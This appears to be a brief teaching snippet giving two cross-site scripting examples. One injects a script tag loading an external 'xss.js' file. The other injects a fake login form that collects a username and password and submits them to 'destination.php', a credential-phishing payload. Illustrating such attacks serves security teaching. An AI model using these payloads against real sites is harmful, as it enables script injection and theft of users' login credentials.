A couple of XSS examples

1. Type <script src=xss.js></script> into the hacker's search box
2. Type <br><br>Please login with the form below before proceeding:<form action="destination.php"> <table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr> <tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table> <input type=submit value=LOGIN></form>